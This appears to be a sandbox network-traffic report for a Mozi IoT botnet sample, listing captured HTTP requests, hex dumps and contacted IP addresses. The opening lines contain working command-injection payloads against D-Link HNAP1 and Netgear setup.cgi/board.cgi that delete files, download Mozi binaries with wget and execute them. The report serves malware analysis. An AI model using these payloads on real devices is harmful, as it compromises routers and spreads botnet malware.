Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 46.254.184.147:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.208.233.170:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.5X-AspNet-Version: 1.1.4322Set-Cookie: ASP.NET_SessionId=2t0qh0ecr3aygl45zqhp5555; path=/Set-Cookie: awstats=1; path=/X-Powered-By: http://www.evoSuite.comDate: Fri, 21 Jan 2022 03:35:26 GMTContent-Length: 926Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 f4 db 6f be 78 9e be fc ea c9 f3 b3 93 f4 a3 ed bb 77 bf 7b ef e4 ee dd a7 6f 9e ca 17 fb e3 9d f4 4d 9d 2d 9b a2 2d aa 65 56 de bd 7b fa e2 a3 23 7a 1f df d2 cf 1f 7b fc ed d3 e3 a7 f8 e5 c7 1e b7 45 5b e6 47 af f3 e9 ba ce d3 26 6f 1a 7a 23 5d 56 6d 5a e7 d3 ea 62 59 34 f9 2c dd 3e 4a 3f ff 32 7d 72 7c f2 7b fd ae 8f ef ca 0b fc ee 22 6f b3 74 99 2d f2 cf 3e fa fc f4 c5 e9 ab e3 37 5f be fa 28 9d 56 cb 36 5f b6 9f 7d f4 45 31 ad ab a6 3a 6f d3 9f 2c 9a 75 56 a6 af db f5 ac a8 d2 f1 8b d3 37 e9 83 f1 2e 50 0a a1 9c 7c f9 f4 f4 f7 7f 7e fc e2 f3 af 8e 3f 3f f5 20 e9 fb 4f b2 a6 98 6e 78 fd b2 f9 fd 67 f9 79 b6 2e db 93 b2 a0 17 5f 4f eb 62 d5 7a 70 be 93 5d 66 fa 61 ec e5 36 ab 2f 72 7a 6b 9e 2f 32 ef ad 79 db ae 1e dd bd db f0 e7 cd 78 61 86 35 9e 56 8b bb 05 35 2a 4b 22 d3 b2 c9 ef 16 f9 7d 06 fc f8 ae 21 f0 e3 27 5f 3e fd 7d f0 cb 8f 3d 3e af ea 85 f6 f5 8c 7e dd fd 28 a5 de e7 d5 ec b3 8f 56 55 43 58 66 53 cc d6 67 1f e9 10 2e aa 49 36 7d 3b ce 9a d5 bb df e3 17 7d b6 fb 0b b3 c5 ea f0 b3 fd 9d fd 43 45 67 77 ef c1 78 87 fe db 7d 74 b0 73 f7 f3 55 b5 04 d0 bb b3 22 bb f8 fd f1 db ef 51 2c b2 8b bc b9 fb 51 5a 50 0f f8 84 09 f6 b8 58 ae d6 6d da 5e af 08 8d 79 31 9b e5 cb 8f 14 a9 df ff f7 ff c9 b3 d3 ef be 7e 73 fc 86 48 7f 99 95 6b fa 6c f6 f4 aa 7d f1 d3 5f ed 7c f1 83 e9 f5 17 6f de ee 7e f9 83 e6 93 8b fa 17 3d 7b fd ba 58 ec fe de 2f 4f 0e 5e ee 2f 2f db 57 d5 a7 5f fe a2 b3 27 ef 2e 3e fb 28 bd 4b 9d 60 b8 3f f6 f8 cd f1 93 e7 a7 dc fb 9b 6c 52 e6 34 de 29 51 ea f5 2a 9b 16 4b 6a a9 7f bf cc 66 33 f3 f7 55 31 6b e7 9f 7d f4 e9 ce 0e 51 a3 2c 2e 88 18 53 9a 81 bc fe 28 9d 54 f5 2c af d1 8a e0 13 74 02 ff 4a 7f a3 5f 9f 76 9a 1f fd c2 e5 a4 59 1d 3e 7e 62 db fc d8 ef 53 ad d3 79 76 99 13 5f 67 34 91 b3 34 23 6e 17 a6 2f da 3c 5d 83 cf 69 86 d2 69 9d cf 8a 36 9d 66 f5 2c 5d d5 d5 14 12 b1 bc 18 f9 a0 26 44 c0 ab 9c 9a 88 a0 14 44 c3 b6 38 bf 4e af e6 39 81 bb a6 8e aa ba b8 28 96 59 0b 98 75 b5 18 fb 6f fb bf bf 2c f3 ac 01 4a ed ba 5e a6 6d 85 97 6b f3 76 29 98 65 cb 59 da d6 d7 69 76 91 15 4b 1f d2 e3 bb 6f 98 c5 e8 a1 5f f5 63 fa 0d 64 d7 3f 1a e6 f5 b4 cc 96 17 6b e2 86 cf 3e fa 69 12 00 f9 d0 d0 f1 ee dd 79 d1 b4 55 7d 3d 06 bb 6d dd 39 e4 8f 1f 13 b7 a3 15 37 7a 7c 97 08 b3 c0 af 8f ef 2a 3b 13

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 125.142.139.91
Source: unknown	TCP traffic detected without corresponding DNS query: 205.124.213.207
Source: unknown	TCP traffic detected without corresponding DNS query: 153.229.65.202
Source: unknown	TCP traffic detected without corresponding DNS query: 46.3.169.39
Source: unknown	TCP traffic detected without corresponding DNS query: 105.166.137.150
Source: unknown	TCP traffic detected without corresponding DNS query: 121.159.104.6
Source: unknown	TCP traffic detected without corresponding DNS query: 78.233.217.54
Source: unknown	TCP traffic detected without corresponding DNS query: 173.124.45.94
Source: unknown	TCP traffic detected without corresponding DNS query: 41.61.179.158
Source: unknown	TCP traffic detected without corresponding DNS query: 217.132.116.242
Source: unknown	TCP traffic detected without corresponding DNS query: 220.50.66.153
Source: unknown	TCP traffic detected without corresponding DNS query: 68.208.81.105
Source: unknown	TCP traffic detected without corresponding DNS query: 138.183.57.233
Source: unknown	TCP traffic detected without corresponding DNS query: 76.69.130.42
Source: unknown	TCP traffic detected without corresponding DNS query: 81.157.18.69
Source: unknown	TCP traffic detected without corresponding DNS query: 25.117.44.31
Source: unknown	TCP traffic detected without corresponding DNS query: 159.48.209.196
Source: unknown	TCP traffic detected without corresponding DNS query: 154.37.153.102
Source: unknown	TCP traffic detected without corresponding DNS query: 137.50.209.196
Source: unknown	TCP traffic detected without corresponding DNS query: 170.247.26.46
Source: unknown	TCP traffic detected without corresponding DNS query: 146.252.138.219
Source: unknown	TCP traffic detected without corresponding DNS query: 130.245.77.217
Source: unknown	TCP traffic detected without corresponding DNS query: 170.248.31.222
Source: unknown	TCP traffic detected without corresponding DNS query: 68.69.157.29
Source: unknown	TCP traffic detected without corresponding DNS query: 142.82.165.34
Source: unknown	TCP traffic detected without corresponding DNS query: 186.197.154.193
Source: unknown	TCP traffic detected without corresponding DNS query: 199.253.175.69
Source: unknown	TCP traffic detected without corresponding DNS query: 199.240.101.94
Source: unknown	TCP traffic detected without corresponding DNS query: 33.160.138.35
Source: unknown	TCP traffic detected without corresponding DNS query: 29.14.250.60
Source: unknown	TCP traffic detected without corresponding DNS query: 44.230.88.116
Source: unknown	TCP traffic detected without corresponding DNS query: 173.212.119.218
Source: unknown	TCP traffic detected without corresponding DNS query: 42.217.20.173
Source: unknown	TCP traffic detected without corresponding DNS query: 43.190.131.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.248.206.34
Source: unknown	TCP traffic detected without corresponding DNS query: 4.143.102.140
Source: unknown	TCP traffic detected without corresponding DNS query: 27.174.228.124
Source: unknown	TCP traffic detected without corresponding DNS query: 112.81.89.51
Source: unknown	TCP traffic detected without corresponding DNS query: 129.241.209.154
Source: unknown	TCP traffic detected without corresponding DNS query: 68.252.36.133
Source: unknown	TCP traffic detected without corresponding DNS query: 221.149.172.42
Source: unknown	TCP traffic detected without corresponding DNS query: 189.97.112.66
Source: unknown	TCP traffic detected without corresponding DNS query: 87.235.240.17
Source: unknown	TCP traffic detected without corresponding DNS query: 201.214.117.34
Source: unknown	TCP traffic detected without corresponding DNS query: 9.171.24.117
Source: unknown	TCP traffic detected without corresponding DNS query: 171.221.140.142
Source: unknown	TCP traffic detected without corresponding DNS query: 186.104.158.59
Source: unknown	TCP traffic detected without corresponding DNS query: 19.55.75.43
Source: unknown	TCP traffic detected without corresponding DNS query: 138.111.158.127

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundSet-Cookie: CookieConsentPolicy=0:0; domain=161.71.2.41; path=/; expires=Sat, 21-Jan-2023 03:32:59 GMT; Max-Age=31536000Set-Cookie: LSKey-c$CookieConsentPolicy=0:0; domain=161.71.2.41; path=/; expires=Sat, 21-Jan-2023 03:32:59 GMT; Max-Age=31536000X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: upgrade-insecure-requestsX-Robots-Tag: noneCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedData Raw: 37 62 34 0d 0a 3c 74 61 62 6c 65 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 22 3e 55 52 4c 20 4e 6f 20 4c 6f 6e 67 65 72 20 45 78 69 73 74 73 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 64 3e 59 6f 75 20 68 61 76 65 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 72 65 61 63 68 20 61 20 55 52 4c 20 74 68 61 74 20 6e 6f 20 6c 6f 6e 67 65 72 20 65 78 69 73 74 73 20 6f 6e 20 73 61 6c 65 73 66 6f 72 63 65 2e 63 6f 6d 2e 20 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 0a 59 6f 75 20 6d 61 79 20 68 61 76 65 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 61 66 74 65 72 20 63 6c 69 63 6b 69 6e 67 20 6f 6e 20 61 20 64 69 72 65 63 74 20 6c 69 6e 6b 20 69 6e 74 6f 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 54 68 69 73 20 64 69 72 65 63 74 20 6c 69 6e 6b 20 6d 69 67 68 74 20 62 65 3a 20 3c 62 72 2f 3e 0a 26 23 38 32 32 36 3b 20 41 20 62 6f 6f 6b 6d 61 72 6b 20 74 6f 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 2c 20 73 75 63 68 20 61 73 20 61 20 72 65 70 6f 72 74 20 6f 72 20 76 69 65 77 20 3c 62 72 2f 3e 0a 26 23 38 32 32 36 3b 20 41 20 6c 69 6e 6b 20 74 6f 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 20 69 6e 20 74 68 65 20 43 75 73 74 6f 6d 20 4c 69 6e 6b 73 20 73 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 48 6f 6d 65 20 54 61 62 2c 20 6f 72 20 61 20 43 75 73 74 6f 6d 20 4c 69 6e 6b 20 3c 62 72 2f 3e 0a 26 23 38 32 32 36 3b 20 41 20 6c 69 6e 6b 20 74 6f 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 20 69 6e 20 79 6f 75 72 20 65 6d 61 69 6c 20 74 65 6d 70 6c 61 74 65 73 20 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 74 68 72 6f 75 67 68 20 61 20 62 6f 6f 6b 6d 61 72 6b 2c 20 79 6f 75 20 61 72 65 20 70 72 6f 62 61 62 6c 79 20 74 72 79 69 6e 67 20 74 6f 20 61 63 63 65 73 73 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 68 61 73 20 6d 6f 76 65 64 2e 20 50 6c 65 61 73 65 20 75 70 64 61 74 65 20 79 6f 75 72 20 62 6f 6f 6b 6d 61 72 6b 2e 20 3c 62 72 2f 3e 0a 3c 62 72 2f 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 74 68 72 6f 75 67 68 20 61 6e 79 20 6f 66 20 74 68 65 20 6f 74 68 65 72 20 64 69 72 65 63 74 20 6c 69 6e 6b 73 Data Ascii: 7b4<table cellspacing=10><tr><td><span style="font-weight: bold;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:33:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 21 Jan 2022 03:33:06 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:33:27 GMTServer: Apache/2.4.38 (Debian)Content-Length: 292Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 32 2d 31 31 38 2d 32 36 2d 35 38 2e 68 6f 73 74 73 2e 6d 68 6f 73 74 69 6e 67 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 92-118-26-58.hosts.mhosting.hu Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 3368Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 32 31 34 2e 37 35 2e 31 37 36 2e 31 34 38 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 23 63 7b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 32 30 3b 70 61 64 64 69 6e 67 3a 32 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 68 32 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 0a 68 31 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 32 7b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 33 7b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 35 7b 6d 61 72 67 69 6e 3a 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 37 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 38 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 35 36 70 78 3b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0a 3c 64 69 76 20 69 64 3d 22 63 22 3e 0a 3c 68 38 3e 3c 70 3e 20 55 53 43 59 42 45 52 43 4f 4d 20 3c 2f 70 3e 3c 2f 68 38 3e 0a 0a 3c 68 31 3e 20 41 50 50 4c 49 43 41 54 49 4f 4e 20 42 4c 4f 43 4b 45 44 20 3c 2f 68 31 3e 3c 62 72 3e 3c 68 72 3e 3c 62 72 3e 3c 68 32 3e 3c 70 3e 59 6f 75 20 68 61 76 65 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 61 63 63 65 73 73 20 61 20 62 6c 6f 63 6b 65 64 20 77 65 62 73 69 74 65 2e 20 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 77 65 62 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 66 6f 72 20 6f 70 65 72 61 74 69 6f 6e 61 6c 20 72 65 61 73 6f 6e 73 20 62 79 20 74 68 65 20 44 4f 44 20 45 6e 74 65 72 70 72 69 73 65 2d 4c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: security_session_verify=25bea19ce72247a1479c870555f9acf3; expires=Mon, 24-Jan-22 11:33:39 GMT; path=/; HttpOnlyDate: Fri, 21 Jan 2022 03:33:38 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 